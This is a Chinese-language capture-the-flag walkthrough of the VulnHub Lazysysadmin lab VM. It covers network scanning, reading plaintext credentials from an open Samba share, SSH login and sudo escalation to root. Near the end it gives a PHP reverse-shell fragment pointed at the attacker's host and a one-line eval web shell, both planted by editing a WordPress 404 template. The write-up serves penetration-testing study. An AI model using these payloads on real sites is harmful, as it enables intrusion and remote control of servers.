本文主要记录对 Lazysysadmin 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接: Lazysysadmin
1. ip 探测
-
ip 探测
使用 netdiscover,由于在内网,可以直接扫网网段
root@kali:~# netdiscover -r 10.10.10.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 4 hosts. Total size: 300 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.10.10.1 00:50:56:c0:00:08 2 120 VMware, Inc. 10.10.10.2 00:50:56:e5:a6:4e 1 60 VMware, Inc. 10.10.10.133 00:0c:29:9e:53:39 1 60 VMware, Inc. 10.10.10.254 00:50:56:ea:fa:42 1 60 VMware, Inc.
发现 ip 地址为 10.10.10.133
-
端口扫描
使用 masscan ,可以进行限速
root@kali:~# masscan 10.10.10.133 -p1-1000 --rate=10000 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-08-16 13:16:13 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [1000 ports/host] Discovered open port 22/tcp on 10.10.10.133 Discovered open port 80/tcp on 10.10.10.133 Discovered open port 139/tcp on 10.10.10.133 Discovered open port 445/tcp on 10.10.10.133
-
扫描端口和服务
使用 nmap 扫描
root@kali:~# nmap -T4 -A -v 10.10.10.133 -p0-10000 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 09:18 EDT NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:18 Completed NSE at 09:18, 0.00s elapsed Initiating NSE at 09:18 Completed NSE at 09:18, 0.00s elapsed Initiating ARP Ping Scan at 09:18 Scanning 10.10.10.133 [1 port] Completed ARP Ping Scan at 09:18, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:18 Completed Parallel DNS resolution of 1 host. at 09:18, 0.02s elapsed Initiating SYN Stealth Scan at 09:18 Scanning 10.10.10.133 (10.10.10.133) [10001 ports] Discovered open port 3306/tcp on 10.10.10.133 Discovered open port 22/tcp on 10.10.10.133 Discovered open port 139/tcp on 10.10.10.133 Discovered open port 445/tcp on 10.10.10.133 Discovered open port 80/tcp on 10.10.10.133 Discovered open port 6667/tcp on 10.10.10.133 Completed SYN Stealth Scan at 09:18, 1.41s elapsed (10001 total ports) Initiating Service scan at 09:18 Scanning 6 services on 10.10.10.133 (10.10.10.133) Completed Service scan at 09:19, 11.03s elapsed (6 services on 1 host) Initiating OS detection (try #1) against 10.10.10.133 (10.10.10.133) NSE: Script scanning 10.10.10.133. Initiating NSE at 09:19 Completed NSE at 09:19, 10.27s elapsed Initiating NSE at 09:19 Completed NSE at 09:19, 0.01s elapsed Nmap scan report for 10.10.10.133 (10.10.10.133) Host is up (0.00088s latency). Not shown: 9995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 10.10.10.128 |_ error: Closing link: (nmap@10.10.10.128) [Client exited] MAC Address: 00:0C:29:9E:53:39 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.008 days (since Thu Aug 16 09:07:34 2018) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | LAZYSYSADMIN<00> Flags: <unique><active> | LAZYSYSADMIN<03> Flags: <unique><active> | LAZYSYSADMIN<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2018-08-16T23:19:03+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-08-16 09:19:03 |_ start_date: N/A TRACEROUTE HOP RTT ADDRESS 1 0.88 ms 10.10.10.133 (10.10.10.133) NSE: Script Post-scanning. Initiating NSE at 09:19 Completed NSE at 09:19, 0.00s elapsed Initiating NSE at 09:19 Completed NSE at 09:19, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds Raw packets sent: 10024 (441.850KB) | Rcvd: 10017 (401.394KB)
-
爆破目录
使用 dirb 爆破目录
root@kali:~# dirb http://10.10.10.133 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Desktop/result.txt
-
获取服务器的 banner 信息
root@kali:~# curl -I 10.10.10.133 HTTP/1.1 200 OK Date: Thu, 16 Aug 2018 13:29:36 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT ETag: "8ce8-5560ea23d23c0" Accept-Ranges: bytes Content-Length: 36072 Vary: Accept-Encoding Content-Type: text/html
-
使用 wpscan 扫描
root@kali:~# wpscan -u http://10.10.10.133/wordpress --force
-
使用 enum4linux 扫描
root@kali:~# enum4linux 10.10.10.133
-
获取共享资源
win 下
net user k" \\10.10.10.133\share
linux 下
root@kali:~# mount -t cifs -o username='',password='' //10.10.10.133/share$ /mnt root@kali:~# cd /mnt/
发现了两个重要文件 deets.txt 和 wp-config.php
root@kali:/mnt# cat deets.txt CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 root@kali:/mnt/wordpress# cat wp-config.php // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'Admin'); /** MySQL database password */ define('DB_PASSWORD', 'TogieMYSQL12345^^'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');
上述发现敏感文件,密码为 12345,mysql 用户名和密码为 Admin:TogieMYSQL12345^^
-
登录 ssh
登录 phpmyadmin
访问 wordpress 页面发现提示用户名为 togie,使用 ssh 登录ssh togie@10.10.10.133
登录成功
togie@LazySysAdmin:~$ whoami togie togie@LazySysAdmin:~$ id uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie#
查看 flag
root@LazySysAdmin:~# cat proof.txt
-
登录 wordpress
在管理页面的 Apperance -> Editor ,修改 404 页面的模板
添加内容:
set_time_limit (0); $VERSION = "1.0"; $ip = '10.10.10.128'; $port = '4444'; $CHUNK_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a;w;id;/bin/sh -i'; $darmon = 0; $debug = 0;
kali 设置反弹,获取到初始的 shell 环境
或者修改为一句话木马,使用菜刀连接
<?php eval($_POST[pass]);?>http://10.10.10.133/wordpress/wp-content/themes/twentyfifteen/404.php
提示 no tty present and no asdpass program spacified可以使用 python -c ‘import pty; pty.spawn("/bin/sh")’,将初始的 shell 切换为 bash shell 环境